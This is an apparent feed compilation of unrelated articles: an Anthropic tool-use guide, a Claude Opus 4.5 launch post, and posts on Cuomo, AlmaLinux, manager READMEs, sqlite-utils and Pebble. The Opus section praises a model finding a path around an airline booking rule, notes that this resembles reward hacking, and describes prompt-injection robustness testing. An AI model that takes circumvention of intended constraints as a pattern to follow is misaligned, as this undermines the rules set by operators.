    "tool_id": "srvtoolu_abc"
  }
}

You provide the result, which is processed in the Code Execution environment rather than Claude's context. This request-response cycle repeats for each tool call in the code.
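For illustration, returning that result with the Python SDK might look roughly like the sketch below. The tool_result shape follows standard Claude tool use; client, tools, conversation, assistant_blocks, and expense_rows are assumed to exist from the earlier steps and are not part of the documented example.

import json

# The returned rows are consumed by the running script in the sandbox,
# not by the model, so they never enter Claude's context.
follow_up = client.beta.messages.create(
    betas=["advanced-tool-use-2025-11-20"],
    model="claude-sonnet-4-5-20250929",
    max_tokens=4096,
    tools=tools,
    messages=conversation + [
        {"role": "assistant", "content": assistant_blocks},  # includes the tool_use block above
        {"role": "user", "content": [{
            "type": "tool_result",
            "tool_use_id": "toolu_xyz",            # id from the tool_use request
            "content": json.dumps(expense_rows),   # raw expense rows go to the script
        }]},
    ],
)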

4. Only final output enters context

When the code finishes running, only the results of the code are returned to Claude:

{
  "type": "code_execution_tool_result",
  "tool_use_id": "srvtoolu_abc",
  "content": {
    "stdout": "[{\"name\": \"Alice\", \"spent\": 12500, \"limit\": 10000}...]"
  }
}

This is all Claude sees, not the 2000+ expense line items processed along the way.

When to use Programmatic Tool Calling

Programmatic Tool Calling adds a code execution step to your workflow. This extra overhead pays off when the token savings, latency improvements, and accuracy gains are substantial.

Most beneficial when:

  • Processing large datasets where you only need aggregates or summaries
  • Running multi-step workflows with three or more dependent tool calls
  • Filtering, sorting, or transforming tool results before Claude sees them
  • Handling tasks where intermediate data shouldn't influence Claude's reasoning
  • Running parallel operations across many items (checking 50 endpoints, for example)

Less beneficial when:

  • Making simple single-tool invocations
  • Working on tasks where Claude should see and reason about all intermediate results
  • Running quick lookups with small responses

Tool Use Examples

The challenge

JSON Schema excels at defining structure–types, required fields, allowed enums–but it can't express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.

Consider a support ticket API:

{
  "name": "create_ticket",
  "input_schema": {
    "properties": {
      "title": {"type": "string"},
      "priority": {"enum": ["low", "medium", "high", "critical"]},
      "labels": {"type": "array", "items": {"type": "string"}},
      "reporter": {
        "type": "object",
        "properties": {
          "id": {"type": "string"},
          "name": {"type": "string"},
          "contact": {
            "type": "object",
            "properties": {
              "email": {"type": "string"},
              "phone": {"type": "string"}
            }
          }
        }
      },
      "due_date": {"type": "string"},
      "escalation": {
        "type": "object",
        "properties": {
          "level": {"type": "integer"},
          "notify_manager": {"type": "boolean"},
          "sla_hours": {"type": "integer"}
        }
      }
    },
    "required": ["title"]
  }
}

The schema defines what's valid, but leaves critical questions unanswered:

  • Format ambiguity: Should due_date use "2024-11-06", "Nov 6, 2024", or "2024-11-06T00:00:00Z"?
  • ID conventions: Is reporter.id a UUID, "USR-12345", or just "12345"?
  • Nested structure usage: When should Claude populate reporter.contact ?
  • Parameter correlations: How do escalation.level and escalation.sla_hours relate to priority?

These ambiguities can lead to malformed tool calls and inconsistent parameter usage.

Our solution

Tool Use Examples let you provide sample tool calls directly in your tool definitions. Instead of relying on schema alone, you show Claude concrete usage patterns:

{
    "name": "create_ticket",
    "input_schema": { /* same schema as above */ },
    "input_examples": [
      {
        "title": "Login page returns 500 error",
        "priority": "critical",
        "labels": ["bug", "authentication", "production"],
        "reporter": {
          "id": "USR-12345",
          "name": "Jane Smith",
          "contact": {
            "email": "jane@acme.com",
            "phone": "+1-555-0123"
          }
        },
        "due_date": "2024-11-06",
        "escalation": {
          "level": 2,
          "notify_manager": true,
          "sla_hours": 4
        }
      },
      {
        "title": "Add dark mode support",
        "labels": ["feature-request", "ui"],
        "reporter": {
          "id": "USR-67890",
          "name": "Alex Chen"
        }
      },
      {
        "title": "Update API documentation"
      }
    ]
  }

From these three examples, Claude learns:

  • Format conventions : Dates use YYYY-MM-DD, user IDs follow USR-XXXXX, labels use kebab-case
  • Nested structure patterns : How to construct the reporter object with its nested contact object
  • Optional parameter correlations : Critical bugs have full contact info + escalation with tight SLAs; feature requests have reporter but no contact/escalation; internal tasks have title only

In our own internal testing, tool use examples improved accuracy from 72% to 90% on complex parameter handling.

When to use Tool Use Examples

Tool Use Examples add tokens to your tool definitions, so they’re most valuable when accuracy improvements outweigh the additional cost.

Most beneficial when:

  • Complex nested structures where valid JSON doesn't imply correct usage
  • Tools with many optional parameters and inclusion patterns matter
  • APIs with domain-specific conventions not captured in schemas
  • Similar tools where examples clarify which one to use (e.g., create_ticket vs create_incident )

Less beneficial when:

  • Simple single-parameter tools with obvious usage
  • Standard formats like URLs or emails that Claude already understands
  • Validation concerns better handled by JSON Schema constraints

Best practices

Building agents that take real-world actions means handling scale, complexity, and precision simultaneously. These three features work together to solve different bottlenecks in tool use workflows. Here's how to combine them effectively.

Layer features strategically

Not every agent needs to use all three features for a given task. Start with your biggest bottleneck:

  • Context bloat from tool definitions → Tool Search Tool
  • Large intermediate results polluting context → Programmatic Tool Calling
  • Parameter errors and malformed calls → Tool Use Examples

This focused approach lets you address the specific constraint limiting your agent's performance, rather than adding complexity upfront.

Then layer additional features as needed. They're complementary: Tool Search Tool ensures the right tools are found, Programmatic Tool Calling ensures efficient execution, and Tool Use Examples ensure correct invocation.

Set up Tool Search Tool for better discovery

Tool search matches against names and descriptions, so clear, descriptive definitions improve discovery accuracy.

// Good
{
    "name": "search_customer_orders",
    "description": "Search for customer orders by date range, status, or total amount. Returns order details including items, shipping, and payment info."
}

// Bad
{
    "name": "query_db_orders",
    "description": "Execute order query"
}

Add system prompt guidance so Claude knows what's available:

You have access to tools for Slack messaging, Google Drive file management, 
Jira ticket tracking, and GitHub repository operations. Use the tool search 
to find specific capabilities.

Keep your three to five most-used tools always loaded, defer the rest. This balances immediate access for common operations with on-demand discovery for everything else.
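A minimal sketch of that split, assuming a hypothetical all_tools list holding your full tool library:

# Keep a handful of hot tools always loaded; defer everything else for discovery.
ALWAYS_LOADED = {"search_customer_orders", "create_ticket"}  # hypothetical tool names

tools = [{"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"}]
for tool in all_tools:  # your full tool library, assumed defined elsewhere
    tools.append({**tool, "defer_loading": tool["name"] not in ALWAYS_LOADED})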

Set up Programmatic Tool Calling for correct execution

Since Claude writes code to parse tool outputs, document return formats clearly. This helps Claude write correct parsing logic:

{
    "name": "get_orders",
    "description": "Retrieve orders for a customer.
Returns:
    List of order objects, each containing:
    - id (str): Order identifier
    - total (float): Order total in USD
    - status (str): One of 'pending', 'shipped', 'delivered'
    - items (list): Array of {sku, quantity, price}
    - created_at (str): ISO 8601 timestamp"
}

See below for opt-in tools that benefit from programmatic orchestration:

  • Tools that can run in parallel (independent operations)
  • Operations safe to retry (idempotent)

Set up Tool Use Examples for parameter accuracy

Craft examples for behavioral clarity:

  • Use realistic data (real city names, plausible prices, not "string" or "value")
  • Show variety with minimal, partial, and full specification patterns
  • Keep it concise: 1-5 examples per tool
  • Focus on ambiguity (only add examples where correct usage isn't obvious from schema)

Getting started

These features are available in beta. To enable them, add the beta header and include the tools you need:

import anthropic

client = anthropic.Anthropic()

client.beta.messages.create(
    betas=["advanced-tool-use-2025-11-20"],
    model="claude-sonnet-4-5-20250929",
    max_tokens=4096,
    tools=[
        {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},
        {"type": "code_execution_20250825", "name": "code_execution"},
        # Your tools with defer_loading, allowed_callers, and input_examples
    ]
)
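As a sketch of what that commented-out tools list might contain once all three features are combined (the get_orders tool, its schema, and the example values below are hypothetical):

tools = [
    {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},
    {"type": "code_execution_20250825", "name": "code_execution"},
    {
        "name": "get_orders",
        "description": "Retrieve orders for a customer. Returns a list of {id, total, status}.",
        "input_schema": {
            "type": "object",
            "properties": {"customer_id": {"type": "string"}},
            "required": ["customer_id"],
        },
        "defer_loading": True,                              # discovered on demand via tool search
        "allowed_callers": ["code_execution_20250825"],     # callable from orchestration code
        "input_examples": [{"customer_id": "CUST-00123"}],  # shows the expected ID convention
    },
]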

For detailed API documentation and SDK examples, see our developer documentation.

These features move tool use from simple function calling toward intelligent orchestration. As agents tackle more complex workflows spanning dozens of tools and large datasets, dynamic discovery, efficient execution, and reliable invocation become foundational.

We're excited to see what you build.

Acknowledgements

Written by Bin Wu, with contributions from Adam Jones, Artur Renault, Henry Tay, Jake Noble, Nathan McCandlish, Noah Picard, Sam Jiang, and the Claude Developer Platform team. This work builds on foundational research by Chris Gorgolewski, Daniel Jiang, Jeremy Fox and Mike Lambert. We also drew inspiration from across the AI ecosystem, including Joel Pobar's LLMVM , Cloudflare's Code Mode and Code Execution as MCP . Special thanks to Andy Schumeister, Hamish Kerr, Keir Bradwell, Matt Bleifer and Molly Vorwerck for their support.

Andrew Cuomo Is Riding This Thing All the Way to the Bottom

hellgate
hellgatenyc.com
2025-11-24 19:18:33
Cuomo and another washed up former governor telling each other "Exactlyyyyy."...
Original Article

Andrew Cuomo, who resigned in disgrace as governor to avoid being impeached, before being soundly rejected by voters twice this year when he ran for mayor of New York City, is not going gently into that good night.

Across two excruciating hours on Monday morning, Cuomo and his inconstant ally , former Governor David Paterson , discussed the election on John Catsimatidis's radio station . Listeners tuning in to hear new analysis or insight born of a little distance from Election Day were disappointed.

At a plodding pace, intermittently interrupted by musical cues signalling the need to cut to personal injury lawyer commercials, the two men relitigated the election, agreeing with each other that all the points they made during the campaign that failed to persuade voters—free buses are a pipe dream, taxing the rich is folly, the city is teetering on the edge of a crime crisis for which more police are the only solution—were in fact correct. They agreed that Cuomo should have won but for a bunch of factors that don't really signify anything; that the man voters preferred to Cuomo, Zohran Mamdani, is a panderer selling a policy program of "no classes, free pizza on Friday"; and that Mamdani doesn't have a mandate, because lots of people voted for Cuomo. Further consensus: Mamdani was good at TikTok, but his policies don't make sense. They will drive the rich and the middle class from New York. Cuomo would have won, but for Curtis Sliwa and his enormous ego; Sliwa embarrassed himself.

As the old saw goes , "It is always 2 dumb bitches telling each other 'exactlyyyyy.'"


AlmaLinux 10.1 released

Linux Weekly News
lwn.net
2025-11-24 19:18:14
AlmaLinux 10.1 has been released. In addition to providing binary compatibility with Red Hat Enterprise Linux (RHEL) 10.1, the most notable feature in AlmaLinux 10.1 is the addition of support for Btrfs, which is not available in RHEL: Btrfs support encompasses both kernel and userspace ...
Original Article

AlmaLinux 10.1 has been released . In addition to providing binary compatibility with Red Hat Enterprise Linux (RHEL) 10.1, the most notable feature in AlmaLinux 10.1 is the addition of support for Btrfs , which is not available in RHEL:

Btrfs support encompasses both kernel and userspace enablement, and it is now possible to install AlmaLinux OS on a Btrfs filesystem from the very beginning. Initial enablement was scoped to the installer and storage management stack, and broader support within the AlmaLinux software collection for Btrfs features is forthcoming.

In addition to Btrfs support, AlmaLinux OS 10.1 includes numerous other improvements to serve our community. We have continued to extend hardware support both by adding drivers and by adding a secondary version of AlmaLinux OS and EPEL to extend support of x86_64_v2 processors.

See the release notes for a full list of changes.



Revisiting Manager READMEs

Elided Branches
www.elidedbranches.com
2025-11-22 19:02:00
Several years ago, I published a critique of manager READMEs that succeeded in stirring up a lot of feelings, pro and con. I’d like to believe it prompted some people to reconsider whether these are actually effective tools.Today, I want to revisit this. Not to encourage you to write a manager READM...
Original Article

Several years ago, I published a critique of manager READMEs that succeeded in stirring up a lot of feelings, pro and con. I’d like to believe it prompted some people to reconsider whether these are actually effective tools.

Today, I want to revisit this. Not to encourage you to write a manager README, but to suggest other ways forward that I have learned in the years since writing the first post.

The Problem

When you become a senior manager or an executive, you face new challenges. Your job involves directing work across many people with different approaches, styles, and opinions. Left to their own devices, each person will develop a slightly different way of communicating with you, one that works for them and that they believe works for you.

With a broad scope of work to oversee, you need to quickly grasp what matters and should be shared upward, outward, and down into different parts of your organization. Now, at most companies, this is a known problem and inevitably someone has already tried to solve it by means of standardized tooling and reporting. Everyone uses Jira for a reason and it’s not that Jira is the best tool ever, but it is malleable to many types of standardization. Companies implement OKR tools and Tableau dashboards, they institute various program management processes, they run quarterly business reviews, and all of these are done in the name of standardizing the information that is passed upward and outward so that people can make better decisions.

Unfortunately, this is typically the lowest common denominator of usefulness to any senior manager. Reporting generated in this way obscures as much as it reveals, and it rarely addresses the things that you really care about¹. So senior managers need other mechanisms for imparting what they want to hear about and see. The README can sometimes be an attempt to impart that cultural overlay: a way of saying, “I care about X, and want you to focus on that when you communicate to me; I don’t care much about Y and Z, and by the way, it’s best if you communicate with me in these ways.”

I remain steadfast that this is not a good approach. It creates a focus on you as the person to be managed up to. Your personality must be accommodated, your preferences honored. I get the desire for this, and I’m certainly not immune to being managed up to, but my preference is to avoid major blind spots. I want to hear what I care about, yes, but I don’t want to live in an information bubble either.

READMEs are also rather lazy. There’s a kernel of truth in their purpose: we want people to focus certain types of communication on what we believe is most valuable. However, doing it in the form of a general README isn’t actually the most effective approach.

So if not READMEs, what then?

The Solution: Appropriate Templates and Ceremonies

Instead of one doc that attempts to communicate all of your preferences and warts and creates a you-focused mindset, it’s time to level up and recognize that a big part of the job of senior/executive management is setting standards for doing certain types of work. The best way to set those standards, in my experience, is lightweight templates and ceremonies for information sharing, discussion, and decision-making.

I think that every good senior manager should have some toolkit of these. You aren’t just going to operate against the lowest common denominator of pre-existing reports and processes in your company, you have to establish a few processes that exist to show what you care about and where you want the organization to focus. One of mine is Wins and Challenges (discussed in my recent book ), which I’ve brought from startups to giant teams and everything in-between. Is it extra work on top of whatever people might be doing in Jira or other tools? Possibly. Does it create far more valuable conversation across my leadership team than those tools? Yes. Does it help me specifically understand things and do my job better? Absolutely.

There is a very lightweight template to follow for my Wins and Challenges, and the process details are owned by the team gathering the information (although I specify opinions about how it should be done, I only check the outcomes). I find that the best templates and processes are lightweight in a way that they show what information should be collected but don’t dictate exactly the process to collect that information.

Developing templates that expose the right useful information is hard. You will both over-do and under-do this as you’re figuring it out, whether it’s your first time in the job, you’ve moved to a different company or team, or your team has just evolved past the usefulness of the old methods. My advice is to start simple and add on new details or processes only when it’s clear you have a widespread gap. A good rhythm for a new job/team is to learn for 90 days, then introduce what you need, and evolve from there with enough time to learn from each iteration (usually, 1-2 quarters).

Don’t Try To Template/Processify Everything

I recently asked an experienced CPO about good product processes, and what they looked like from his perspective. One piece of advice was that not everything should have a fixed process or template. When you need to leave room for discussion, it’s often best to limit the structure; a walkthrough of a prototype might be better done as an open-ended exploration and discussion rather than a formal set of steps.

It’s important not to give into the temptation (or external pressure) to create processes for everything. I personally do not have a fixed format for my 1-1s, and dislike even the expectation of coming with a set of written and shared topics. I don’t want to feel rushed to finish everything on an agenda, and the temptation to immediately jump to conclusions about a topic based on an agenda item often increases miscommunication. Sometimes there’s a need to pre-read and prepare, but sometimes we just need to talk and see where the exploration of current top-of-mind concerns and information takes us.

So, senior leaders, you can tell people how you want them to work with you, but don’t do it via the crude mechanism of a manager README. Drive clarity through templates and processes where needed, resist the urge to create them everywhere, and lead your organization by showing them where to spend their time and focus as a collective good, not just good for you.

¹ Think of it this way, if you could easily see the problems via the pre-existing dashboards, they’d already be on their way to being solved. Dashboards are like alerts and tests in this way, they tend to catch what you know could go wrong, but rarely the surprise problems that lead to big incidents. Necessary, but insufficient.

Enjoy this post? You might like my books: The Manager’s Path , and Platform Engineering: A Guide for Technical, Product, and People Leaders , available on Amazon and Safari Online.

sqlite-utils 3.39

Simon Willison
simonwillison.net
2025-11-24 18:59:14
sqlite-utils 3.39 I got a report of a bug in sqlite-utils concerning plugin installation - if you installed the package using uv tool install further attempts to install plugins with sqlite-utils install X would fail, because uv doesn't bundle pip by default. I had the same bug with Datasette a whil...
Original Article

sqlite-utils 3.39 . I got a report of a bug in sqlite-utils concerning plugin installation - if you installed the package using uv tool install further attempts to install plugins with sqlite-utils install X would fail, because uv doesn't bundle pip by default. I had the same bug with Datasette a while ago , turns out I forgot to apply the fix to sqlite-utils .

Since I was pushing a new dot-release I decided to integrate some of the non-breaking changes from the 4.0 alpha I released last night .

I tried to have Claude Code do the backporting for me:

create a new branch called 3.x starting with the 3.38 tag, then consult https://github.com/simonw/sqlite-utils/issues/688 and cherry-pick the commits it lists in the second comment, then review each of the links in the first comment and cherry-pick those as well. After each cherry-pick run the command "just test" to confirm the tests pass and fix them if they don't. Look through the commit history on main since the 3.38 tag to help you with this task.

This worked reasonably well - here's the terminal transcript . It successfully argued me out of two of the larger changes which would have added more complexity than I want in a small dot-release like this.

I still had to do a bunch of manual work to get everything up to scratch, which I carried out in this PR - including adding comments there and then telling Claude Code:

Apply changes from the review on this PR https://github.com/simonw/sqlite-utils/pull/689

Here's the transcript from that .

The release is now out with the following release notes:

  • Fixed a bug with sqlite-utils install when the tool had been installed using uv. (#687)
  • The --functions argument now optionally accepts a path to a Python file as an alternative to a string full of code, and can be specified multiple times - see Defining custom SQL functions and the short sketch after this list. (#659)
  • sqlite-utils now requires Python 3.10 or higher.
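
To make the --functions change concrete, here is a minimal sketch of a file you could pass to that option. It assumes the behaviour described in the sqlite-utils documentation on defining custom SQL functions: every top-level function defined in the supplied code is registered as a SQL function under its own name. The file name, database, table, and function names below are invented for illustration.

# functions.py - hypothetical example file for the --functions option
def reverse_string(s):
    "Return the input string reversed."
    return s[::-1]

def email_domain(email):
    "Return the domain portion of an email address."
    return email.split("@")[-1]

# Assumed invocation, mixing a file path with an inline string of code:
#   sqlite-utils query data.db "select reverse_string(name), email_domain(email) from people" \
#     --functions functions.py \
#     --functions 'def upper(s): return s.upper()'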

Claude Opus 4.5

Hacker News
www.anthropic.com
2025-11-24 18:53:05
Comments...
Original Article

Our newest model, Claude Opus 4.5, is available today. It’s intelligent, efficient, and the best model in the world for coding, agents, and computer use. It’s also meaningfully better at everyday tasks like deep research and working with slides and spreadsheets. Opus 4.5 is a step forward in what AI systems can do, and a preview of larger changes to how work gets done.

Claude Opus 4.5 is state-of-the-art on tests of real-world software engineering:

Chart comparing frontier models on SWE-bench Verified where Opus 4.5 scores highest

Opus 4.5 is available today on our apps, our API, and on all three major cloud platforms. If you’re a developer, simply use claude-opus-4-5-20251101 via the Claude API . Pricing is now $5/$25 per million tokens—making Opus-level capabilities accessible to even more users, teams, and enterprises.

Alongside Opus, we’re releasing updates to the Claude Developer Platform , Claude Code , and our consumer apps . There are new tools for longer-running agents and new ways to use Claude in Excel, Chrome, and on desktop. In the Claude apps, lengthy conversations no longer hit a wall. See our product-focused section below for details.

First impressions

As our Anthropic colleagues tested the model before release, we heard remarkably consistent feedback. Testers noted that Claude Opus 4.5 handles ambiguity and reasons about tradeoffs without hand-holding. They told us that, when pointed at a complex, multi-system bug, Opus 4.5 figures out the fix. They said that tasks that were near-impossible for Sonnet 4.5 just a few weeks ago are now within reach. Overall, our testers told us that Opus 4.5 just “gets it.”

Many of our customers with early access have had similar experiences. Here are some examples of what they told us:

Opus models have always been “the real SOTA” but have been cost prohibitive in the past. Claude Opus 4.5 is now at a price point where it can be your go-to model for most tasks. It’s the clear winner and exhibits the best frontier task planning and tool calling we’ve seen yet.

Claude Opus 4.5 delivers high-quality code and excels at powering heavy-duty agentic workflows with GitHub Copilot. Early testing shows it surpasses internal coding benchmarks while cutting token usage in half , and is especially well-suited for tasks like code migration and code refactoring.

Claude Opus 4.5 beats Sonnet 4.5 and competition on our internal benchmarks, using fewer tokens to solve the same problems . At scale, that efficiency compounds.

Claude Opus 4.5 delivers frontier reasoning within Lovable's chat mode , where users plan and iterate on projects. Its reasoning depth transforms planning—and great planning makes code generation even better.

Claude Opus 4.5 excels at long-horizon, autonomous tasks , especially those that require sustained reasoning and multi-step execution. In our evaluations it handled complex workflows with fewer dead-ends. On Terminal Bench it delivered a 15% improvement over Sonnet 4.5, a meaningful gain that becomes especially clear when using Warp’s Planning Mode.

Claude Opus 4.5 achieved state-of-the-art results for complex enterprise tasks on our benchmarks, outperforming previous models on multi-step reasoning tasks that combine information retrieval, tool use, and deep analysis.

Claude Opus 4.5 delivers measurable gains where it matters most : stronger results on our hardest evaluations and consistent performance through 30-minute autonomous coding sessions.

Claude Opus 4.5 represents a breakthrough in self-improving AI agents . For office automation, our agents were able to autonomously refine their own capabilities—achieving peak performance in 4 iterations while other models couldn’t match that quality after 10.

Claude Opus 4.5 is a notable improvement over the prior Claude models inside Cursor , with improved pricing and intelligence on difficult coding tasks.

Claude Opus 4.5 is yet another example of Anthropic pushing the frontier of general intelligence . It performs exceedingly well across difficult coding tasks, showcasing long-term goal-directed behavior.

Claude Opus 4.5 delivered an impressive refactor spanning two codebases and three coordinated agents. It was very thorough, helping develop a robust plan, handling the details and fixing tests. A clear step forward from Sonnet 4.5 .

Claude Opus 4.5 handles long-horizon coding tasks more efficiently than any model we’ve tested . It achieves higher pass rates on held-out tests while using up to 65% fewer tokens, giving developers real cost control without sacrificing quality.

We’ve found that Opus 4.5 excels at interpreting what users actually want, producing shareable content on the first try . Combined with its speed, token efficiency, and surprisingly low cost, it’s the first time we’re making Opus available in Notion Agent.

Claude Opus 4.5 excels at long-context storytelling , generating 10-15 page chapters with strong organization and consistency. It's unlocked use cases we couldn't reliably deliver before.

Claude Opus 4.5 sets a new standard for Excel automation and financial modeling . Accuracy on our internal evals improved 20%, efficiency rose 15%, and complex tasks that once seemed out of reach became achievable.

Claude Opus 4.5 is the only model that nails some of our hardest 3D visualizations . Polished design, tasteful UX, and excellent planning & orchestration - all with more efficient token usage. Tasks that took previous models 2 hours now take thirty minutes.

Claude Opus 4.5 catches more issues in code reviews without sacrificing precision . For production code review at scale, that reliability matters.

Based on testing with Junie, our coding agent, Claude Opus 4.5 outperforms Sonnet 4.5 across all benchmarks . It requires fewer steps to solve tasks and uses fewer tokens as a result. This indicates that the new model is more precise and follows instructions more effectively — a direction we’re very excited about.

The effort parameter is brilliant. Claude Opus 4.5 feels dynamic rather than overthinking , and at lower effort delivers the same quality we need while being dramatically more efficient. That control is exactly what our SQL workflows demand.

We’re seeing 50% to 75% reductions in both tool calling errors and build/lint errors with Claude Opus 4.5 . It consistently finishes complex tasks in fewer iterations with more reliable execution.

Evaluating Claude Opus 4.5

We give prospective performance engineering candidates a notoriously difficult take-home exam. We also test new models on this exam as an internal benchmark. Within our prescribed 2-hour time limit, Claude Opus 4.5 scored higher than any human candidate ever¹.

The take-home test is designed to assess technical ability and judgment under time pressure. It doesn’t test for other crucial skills candidates may possess, like collaboration, communication, or the instincts that develop over years. But this result—where an AI model outperforms strong candidates on important technical skills—raises questions about how AI will change engineering as a profession. Our Societal Impacts and Economic Futures research is aimed at understanding these kinds of changes across many fields. We plan to share more results soon.

Software engineering isn’t the only area on which Claude Opus 4.5 has improved. Capabilities are higher across the board—Opus 4.5 has better vision, reasoning, and mathematics skills than its predecessors, and it is state-of-the-art in many domains:

Comparison table showing frontier model performance across popular benchmarks

The model’s capabilities outpace some of the benchmarks we use in our tests. A common benchmark for agentic capabilities is τ2-bench , which measures the performance of agents in real-world, multi-turn tasks. In one scenario, models have to act as an airline service agent helping a distressed customer. The benchmark expects models to refuse a modification to a basic economy booking since the airline doesn’t allow changes to that class of tickets. Instead, Opus 4.5 found an insightful (and legitimate) way to solve the problem: upgrade the cabin first, then modify the flights.

Let me think about what options I have within my policy:

1. Modify flights - Basic economy cannot be modified. This is clear in the policy.
2. Change cabin - Wait, let me check this option! The policy says:
"In other cases, all reservations, including basic economy, can change cabin without changing the flights."

But he wants to change the flights, not just the cabin. However, what if we:
- Change the cabin first (which IS allowed for basic economy), then
- Change the flights (which is allowed for non-basic economy)

So the strategy could be:
1. Upgrade his cabin from basic economy to economy (or business)
2. Then modify the flights to be 2 days later

This would cost more money, but it’s a legitimate path within the policy!

The benchmark technically scored this as a failure because Claude’s way of helping the customer was unanticipated. But this kind of creative problem solving is exactly what we’ve heard about from our testers and customers—it’s what makes Claude Opus 4.5 feel like a meaningful step forward.

In other contexts, finding clever paths around intended constraints could count as reward hacking —where models “game” rules or objectives in unintended ways. Preventing such misalignment is one of the objectives of our safety testing, discussed in the next section.

A step forward on safety

As we state in our system card , Claude Opus 4.5 is the most robustly aligned model we have released to date and, we suspect, the best-aligned frontier model by any developer. It continues our trend towards safer and more secure models:

In our evaluation, “concerning behavior” scores measure a very wide range of misaligned behavior, including both cooperation with human misuse and undesirable actions that the model takes at its own initiative².

Our customers often use Claude for critical tasks. They want to be assured that, in the face of malicious attacks by hackers and cybercriminals, Claude has the training and the “street smarts” to avoid trouble. With Opus 4.5, we’ve made substantial progress in robustness against prompt injection attacks, which smuggle in deceptive instructions to fool the model into harmful behavior. Opus 4.5 is harder to trick with prompt injection than any other frontier model in the industry:

Note that this benchmark includes only very strong prompt injection attacks. It was developed and run by Gray Swan .

You can find a detailed description of all our capability and safety evaluations in the Claude Opus 4.5 system card .

New on the Claude Developer Platform

As models get smarter, they can solve problems in fewer steps: less backtracking, less redundant exploration, less verbose reasoning. Claude Opus 4.5 uses dramatically fewer tokens than its predecessors to reach similar or better outcomes.

But different tasks call for different tradeoffs. Sometimes developers want a model to keep thinking about a problem; sometimes they want something more nimble. With our new effort parameter on the Claude API, you can decide to minimize time and spend or maximize capability.

Set to a medium effort level, Opus 4.5 matches Sonnet 4.5’s best score on SWE-bench Verified, but uses 76% fewer output tokens. At its highest effort level, Opus 4.5 exceeds Sonnet 4.5 performance by 4.3 percentage points—while using 48% fewer tokens.
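
To make that tradeoff concrete, here is a minimal sketch of selecting a lower effort level from the anthropic Python SDK. The model ID is the one given earlier in this post; the field name "effort", its allowed values, and passing it via extra_body are assumptions made for illustration rather than confirmed API details, so check the current API reference before relying on them.

# Sketch: calling Opus 4.5 with a reduced effort setting (field name assumed).
import anthropic

client = anthropic.Anthropic()  # reads ANTHROPIC_API_KEY from the environment

response = client.messages.create(
    model="claude-opus-4-5-20251101",
    max_tokens=2048,
    messages=[{"role": "user", "content": "Summarize the failure in this stack trace: ..."}],
    extra_body={"effort": "medium"},  # assumed request field for the effort control
)
print(response.content[0].text)

Per the methodology note at the end of this post, the benchmark results above were run at the default effort (high), so a call like this one trades some capability for fewer output tokens.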

With effort control , context compaction , and advanced tool use , Claude Opus 4.5 runs longer, does more, and requires less intervention.

Our context management and memory capabilities can dramatically boost performance on agentic tasks. Opus 4.5 is also very effective at managing a team of subagents, enabling the construction of complex, well-coordinated multi-agent systems. In our testing, the combination of all these techniques boosted Opus 4.5’s performance on a deep research evaluation by almost 15 percentage points³.

We’re making our Developer Platform more composable over time. We want to give you the building blocks to construct exactly what you need, with full control over efficiency, tool use, and context management.

Product updates

Products like Claude Code show what’s possible when the kinds of upgrades we’ve made to the Claude Developer Platform come together. Claude Code gains two upgrades with Opus 4.5. Plan Mode now builds more precise plans and executes more thoroughly—Claude asks clarifying questions upfront, then builds a user-editable plan.md file before executing.

Claude Code is also now available in our desktop app , letting you run multiple local and remote sessions in parallel: perhaps one agent fixes bugs, another researches GitHub, and a third updates docs.

For Claude app users, long conversations no longer hit a wall—Claude automatically summarizes earlier context as needed, so you can keep the chat going. Claude for Chrome , which lets Claude handle tasks across your browser tabs, is now available to all Max users. We announced Claude for Excel in October, and as of today we've expanded beta access to all Max, Team, and Enterprise users. Each of these updates takes advantage of Claude Opus 4.5’s market-leading performance in using computers, spreadsheets, and handling long-running tasks.

For Claude and Claude Code users with access to Opus 4.5, we’ve removed Opus-specific caps. For Max and Team Premium users, we’ve increased overall usage limits, meaning you’ll have roughly the same number of Opus tokens as you previously had with Sonnet. We’re updating usage limits to make sure you’re able to use Opus 4.5 for daily work. These limits are specific to Opus 4.5. As future models surpass it, we expect to update limits as needed.

Footnotes

1: This result was achieved using parallel test-time compute, a method that aggregates multiple “tries” from the model and selects from among them. Without a time limit, the model (used within Claude Code) matched the best-ever human candidate.

2: Note that these evaluations were run on an in-progress upgrade to Petri , our open-source, automated evaluation tool. They were run on an earlier snapshot of Claude Opus 4.5. Evaluations of the final production model show a very similar pattern of results when compared to other Claude models, and are described in detail in the Claude Opus 4.5 system card .

3: A fetch-enabled version of BrowseComp-Plus . Specifically, the improvement was from 70.48% without using the combination of techniques to 85.30% using it.

Methodology

All evals were run with a 64K thinking budget, interleaved scratchpads, 200K context window, default effort (high), and default sampling settings (temperature, top_p). Exceptions: SWE-bench Verified (no thinking budget) and Terminal Bench (128K thinking budget). Please see the Claude Opus 4.5 system card for full details.


Pebble Watch software is now 100% open source

Hacker News
ericmigi.com
2025-11-24 18:52:12
Comments...
Original Article

Another big Pebble update today! TLDR:

  • Yesterday, Pebble watch software was ~95% open source. Today, it’s 100% open source. You can download, compile and run all the software you need to use your Pebble. We just published the source code for the new Pebble mobile app!
  • Pebble Appstore now has a publicly available backup and supports multiple feeds, providing long term reliability through decentralization. We’ve launched our own feed and Developer Dashboard.
  • Pebble Time 2 schedule update (aiming to begin shipping in January, with most arriving on wrists in March/April)
  • New Tick Talk episode #4 is up, with Pebble Time 2 demos!

Pre-production Pebble Time 2 (Black/Red colourway) in all its glory

Pebble watch software is now 100% open source

Over the last year, and especially in the last week, I've chatted with tons of people in the Pebble community. One of the main questions people have is ‘how do I know that my new Pebble watch will continue to work long into the future?’. It’s an extremely valid question and concern - one that I share as a fellow Pebble wearer. I called this out specifically in my blog post announcing the relaunch in January 2025. How is this time round going to be different from last time?

There are two pieces to making Pebble sustainable long term - hardware and software.

Hardware

Nothing lasts forever, especially an inexpensive gadget like a Pebble. We want to be able to keep manufacturing these watches long into the future - mostly because I will always want one on my wrist! The company I set up to relaunch Pebble, Core Devices, is self funded, built without investors, and extremely lean. As long as we stay profitable (ie we don’t lose money), we will continue to manufacture new watches.

We’re also making sure that our new watches are more repairable than old Pebble watches. The back cover of Pebble Time 2 is screwed in. You can remove the back cover and replace the battery.

We’ve also published electrical and mechanical design files for Pebble 2 Duo. Yes, you can download the schematic (includes KiCad project files) right now on Github ! This should give you a nice jumpstart to designing your own PebbleOS-compatible device.

Software

